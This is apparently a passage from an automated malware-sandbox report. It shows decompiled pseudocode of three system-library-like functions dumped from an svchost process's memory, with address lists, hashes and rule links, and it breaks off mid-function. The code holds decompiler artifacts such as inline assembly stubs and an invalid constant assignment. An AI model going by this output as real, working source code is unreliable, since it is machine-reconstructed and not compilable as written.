                        • Instruction Fuzzy Hash: D9B16DB4E02309DFCB15EFA8C984AEEFBB9BF89304F148569E405AB345D770A945CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305513A Relevance: .3, Instructions: 258COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E0305513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x311d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0306D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03042280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03044620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0306F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0303FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x311b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0306B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                        0x03055142
                        0x0305514c
                        0x03055150
                        0x03055157
                        0x03055159
                        0x0305515e
                        0x03055165
                        0x03055169
                        0x0305516c
                        0x03055172
                        0x03055176
                        0x0305517a
                        0x0305517a
                        0x0305517a
                        0x0305517f
                        0x03096d8b
                        0x03096d8e
                        0x03096d91
                        0x03096d95
                        0x03096d98
                        0x03096d9c
                        0x03096da0
                        0x03096da3
                        0x03096da7
                        0x03096e26
                        0x03096e26
                        0x03096e2a
                        0x030551f9
                        0x030551f9
                        0x030551fe
                        0x03096e33
                        0x03096e33
                        0x03096e39
                        0x03096e3d
                        0x03096e46
                        0x03096e50
                        0x00000000
                        0x00000000
                        0x03096e52
                        0x03096e53
                        0x03096e56
                        0x03096e5d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03096e5f
                        0x03096e67
                        0x03096e77
                        0x03096e7f
                        0x03096e80
                        0x03096e88
                        0x03096e90
                        0x03096e9f
                        0x03096ea5
                        0x03096ea9
                        0x03096eb1
                        0x03096ebf
                        0x00000000
                        0x00000000
                        0x03096ecf
                        0x03096ed3
                        0x00000000
                        0x00000000
                        0x03096edb
                        0x03096ede
                        0x03096ee1
                        0x03096ee8
                        0x03096eeb
                        0x03096eed
                        0x03096ef0
                        0x03096ef4
                        0x03096ef8
                        0x03096efc
                        0x00000000
                        0x00000000
                        0x03096f0d
                        0x03096f11
                        0x03096f32
                        0x03096f37
                        0x03096f3b
                        0x03096f3e
                        0x03096f41
                        0x03096f46
                        0x00000000
                        0x00000000
                        0x03096f4c
                        0x03096f50
                        0x03096f50
                        0x03096f54
                        0x03096f62
                        0x03096f65
                        0x03096f6d
                        0x03096f7b
                        0x03096f7b
                        0x03096f93
                        0x03096f98
                        0x03096fa0
                        0x03096fa6
                        0x03096fb3
                        0x03096fb6
                        0x03096fbf
                        0x03096fc1
                        0x03096fd5
                        0x03096fda
                        0x03096fda
                        0x03096fdd
                        0x03096fe2
                        0x03096fe7
                        0x03096feb
                        0x03096fef
                        0x03096ff3
                        0x0305520c
                        0x0305520c
                        0x0305520f
                        0x03055215
                        0x03055234
                        0x0305523a
                        0x0305523a
                        0x03055244
                        0x03055245
                        0x03055246
                        0x03055251
                        0x03055251
                        0x03096f13
                        0x03096f17
                        0x03096f17
                        0x03096f18
                        0x03096f1b
                        0x03096f1f
                        0x03096f23
                        0x00000000
                        0x03096f28
                        0x03055204
                        0x03055204
                        0x03055208
                        0x00000000
                        0x03055208
                        0x03055185
                        0x03055188
                        0x0305518a
                        0x0305518e
                        0x03055195
                        0x03096db1
                        0x03096db5
                        0x03096db9
                        0x0305519b
                        0x0305519b
                        0x0305519e
                        0x030551a7
                        0x030551a9
                        0x030551a9
                        0x030551b5
                        0x030551b8
                        0x030551bb
                        0x030551be
                        0x030551c1
                        0x030551c5
                        0x030551c9
                        0x030551cd
                        0x030551cd
                        0x030551d8
                        0x030551dc
                        0x030551e0
                        0x03096dcc
                        0x03096dd0
                        0x03096dd5
                        0x03096ddd
                        0x03096de1
                        0x03096de1
                        0x03096de5
                        0x03096deb
                        0x03096df1
                        0x03096df7
                        0x03096dfd
                        0x03096e01
                        0x03096e05
                        0x03096e09
                        0x03096e0d
                        0x03096e11
                        0x03096e11
                        0x030551eb
                        0x03096e1a
                        0x03096e1f
                        0x03096e21
                        0x03096e23
                        0x00000000
                        0x030551f1
                        0x030551f1
                        0x00000000
                        0x030551f1

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: caffeb9c0dfa62e2cd1c30e73e233e9cf493d1d79ddb1acfdb5aba448c7b2107
                        • Instruction ID: 033560c63bed83963b37037a5d8408cee2d7d7c30948c34d4d27aec43b526940
                        • Opcode Fuzzy Hash: caffeb9c0dfa62e2cd1c30e73e233e9cf493d1d79ddb1acfdb5aba448c7b2107
                        • Instruction Fuzzy Hash: F9C1337550A3808FD754CF28C580A5AFBF1BF89314F188A6EF89A8B352D771E945CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030503E2 Relevance: .3, Instructions: 254COMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E030503E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x311d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03050548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0306B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0303B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x3117c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03047D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03047D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E030A7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03069830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E030A69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x3117c04 != 0) {
						_t118 = _v12;
						_t120 = E030AA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x3117bd8;
						if( *0x3117bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E030695D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E030699A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E030A3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0302B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0306AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x3118474 - 3;
										if( *0x3118474 != 3) {
											 *0x31179dc =  *0x31179dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03047D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03047D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E030A7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x3118708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x3117b00; // 0x0
							asm("ror esi, cl");
							 *0x311b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E030695D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E03037F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                        0x030503f1
                        0x030503f7
                        0x030503f9
                        0x030503fb
                        0x030503fd
                        0x03050400
                        0x0305040a
                        0x03094c7a
                        0x03050537
                        0x03050547
                        0x03050410
                        0x03050410
                        0x03050414
                        0x03050417
                        0x0305041a
                        0x03050421
                        0x03050424
                        0x0305042b
                        0x0305043b
                        0x0305043e
                        0x0305043f
                        0x0305043f
                        0x03050446
                        0x03050449
                        0x0305044c
                        0x0305044f
                        0x03050459
                        0x03094c8d
                        0x0305045f
                        0x0305045f
                        0x0305045f
                        0x03050467
                        0x03094c97
                        0x03094c9d
                        0x03094ca4
                        0x03094caa
                        0x03094caf
                        0x03094cb1
                        0x03094cc3
                        0x03094cb3
                        0x03094cbc
                        0x03094cbc
                        0x03094cc8
                        0x03094ccb
                        0x03094cd7
                        0x03094cda
                        0x03094cdf
                        0x03094cdf
                        0x03094ccb
                        0x03094ca4
                        0x0305046d
                        0x0305046f
                        0x0305046f
                        0x03050471
                        0x03050476
                        0x0305047a
                        0x0305047b
                        0x03050483
                        0x03050489
                        0x0305048d
                        0x00000000
                        0x00000000
                        0x03094ce9
                        0x03094cef
                        0x03094d22
                        0x03094d22
                        0x00000000
                        0x03094d22
                        0x03094cf1
                        0x03094cf7
                        0x00000000
                        0x00000000
                        0x03094cf9
                        0x03094cff
                        0x00000000
                        0x00000000
                        0x03094d05
                        0x03094d07
                        0x00000000
                        0x00000000
                        0x03094d0d
                        0x03094d0f
                        0x03094d14
                        0x03094d16
                        0x00000000
                        0x00000000
                        0x03094d1c
                        0x03094d1c
                        0x03050499
                        0x03050535
                        0x03050535
                        0x00000000
                        0x03050535
                        0x030504a6
                        0x03094d2c
                        0x03094d37
                        0x03094d39
                        0x03094d3b
                        0x00000000
                        0x00000000
                        0x03094d41
                        0x03094d48
                        0x03050527
                        0x0305052b
                        0x0305052d
                        0x03050530
                        0x03050530
                        0x00000000
                        0x0305052b
                        0x03094d4e
                        0x030504ac
                        0x030504ac
                        0x030504af
                        0x030504b2
                        0x030504b7
                        0x030504b9
                        0x030504bb
                        0x030504bd
                        0x030504bf
                        0x030504c5
                        0x030504c9
                        0x03094d53
                        0x03094d59
                        0x03094db9
                        0x03094dba
                        0x03094dbf
                        0x03094dc2
                        0x03094dc4
                        0x03094dc7
                        0x03094dce
                        0x00000000
                        0x03094dce
                        0x03094d5b
                        0x03094d61
                        0x00000000
                        0x00000000
                        0x03094d63
                        0x03094d69
                        0x00000000
                        0x00000000
                        0x03094d6b
                        0x03094d6e
                        0x03094d74
                        0x03094d76
                        0x03094d7c
                        0x03094d7e
                        0x03094d84
                        0x03094d89
                        0x03094d8c
                        0x03094d8d
                        0x03094d92
                        0x03094d95
                        0x03094d96
                        0x03094d98
                        0x03094d9a
                        0x03094d9f
                        0x03094da4
                        0x03094da6
                        0x03094da8
                        0x03094daf
                        0x03094db1
                        0x03094db1
                        0x03094daf
                        0x03094da6
                        0x03094d84
                        0x03094d7c
                        0x00000000
                        0x03094d74
                        0x030504d6
                        0x03094de1
                        0x030504dc
                        0x030504dc
                        0x030504dc
                        0x030504e4
                        0x03094deb
                        0x03094df1
                        0x03094df8
                        0x03094dfe
                        0x03094e03
                        0x03094e05
                        0x03094e17
                        0x03094e07
                        0x03094e10
                        0x03094e10
                        0x03094e1c
                        0x03094e1f
                        0x03094e35
                        0x03094e35
                        0x03094e1f
                        0x03094df8
                        0x030504f1
                        0x030504fa
                        0x03094e3f
                        0x03094e47
                        0x03094e5b
                        0x03094e61
                        0x03094e67
                        0x03094e69
                        0x03094e71
                        0x03094e73
                        0x03050500
                        0x03050500
                        0x03050500
                        0x030504fa
                        0x03050508
                        0x0305051d
                        0x0305051d
                        0x0305051f
                        0x03050524
                        0x00000000
                        0x03050524
                        0x03050515
                        0x03050517
                        0x03094e7a
                        0x03094e7c
                        0x00000000
                        0x00000000
                        0x03094e85
                        0x00000000
                        0x03094e85
                        0x00000000
                        0x03050517

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e91d5585c87325317258cc0c04afed53a349fa03ad28538a8b3b78873e3c1ea5
                        • Instruction ID: 808e480fd63be7af61c28e5d3aa462ba266427a7d6862694686f79963fa2a8ef
                        • Opcode Fuzzy Hash: e91d5585c87325317258cc0c04afed53a349fa03ad28538a8b3b78873e3c1ea5
                        • Instruction Fuzzy Hash: 409125B5E03614AFEF21DA69C844BAFB7E4AB45724F0A0262FD10AB2D0D7749D41CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0302C600 Relevance: .2, Instructions: 225COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E0302C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x311d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E03036D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0306B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3117b9c; // 0x0
					_t74 = L03044620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03069650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L030477F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0306F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E030613C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L030477F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
